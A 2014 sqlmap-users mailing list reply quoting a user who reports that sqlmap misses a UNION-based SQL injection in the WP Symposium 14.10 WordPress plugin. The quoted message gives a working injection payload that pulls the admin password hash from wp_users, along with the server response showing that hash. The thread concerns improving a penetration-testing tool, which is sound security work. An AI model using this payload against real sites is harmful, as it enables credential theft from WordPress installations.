Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
|
From: Miroslav S. <mir...@gm...> - 2014-12-15 16:54:56
|
Hi. I don't see a reason why this form of UNION test would be any different than the regular used by sqlmap. Can you please send me the traffic file for such run (... --flush-session -t traffic.txt) along with console output? Bye On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote: > Hello! > > Playing around with the following vulnerabivlity: > > http://www.exploit-db.com/exploits/35505/ > > > Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION > (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does > result in a response from the server with the hash of the first user: > > 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION > (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split] > > > However, sqlmap only finds a time based injection. Looking at sqlmap > through burp, I do see sqlmap doesn't try an injection syntax like the one > used in the PoC. It may be useful to add a syntax of UNION (SELECT > CONCAT(blah, blah, blah) FROM blah). > > Just a thought! > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > > http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
